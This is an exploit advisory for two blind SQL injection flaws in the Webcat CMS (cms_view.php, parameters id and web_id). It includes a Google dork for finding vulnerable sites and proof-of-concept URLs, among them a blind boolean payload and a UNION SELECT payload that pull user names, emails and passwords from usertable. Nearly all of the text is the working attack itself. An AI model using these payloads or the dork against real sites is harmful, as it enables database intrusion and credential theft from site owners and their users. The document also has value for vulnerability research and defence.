Webcat Blind SQL Injection

`# Exploit Title: Webcat - Two Blind SQL Injection Vulnerabilities  
# Google Dork: allinurl: sc_webcat/ecat/cms_view.php  
# Date: 6/23/2011  
# Author: w0rd (w0rd[at]NULL0x00.com)  
# Software Link: http://webcat.sourceforge.net/  
# Tested on: [Linux/Windows 7]  
#Vulnerable Parameters: web_id=, id=  
##############################################################  
PoC:  
  
http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&id=50'  
http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=1021'  
http://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=1021 and ascii(substring((SELECT concat(user_name,0x3a,user_password,0x3a,email,0x0a) FROM usertable limit 0,1),1,1))>80  
  
I have come across one site where it was not blind, and used this:  
https://www.domain.com/sc_webcat/ecat/cms_view.php?lang=1&web_id=-1 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13,group_concat(email,0x3a,user_password,0x0a),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90 from usertable--  
  
##############################################################  
# Shouts to the Belegit crew  
  
  
`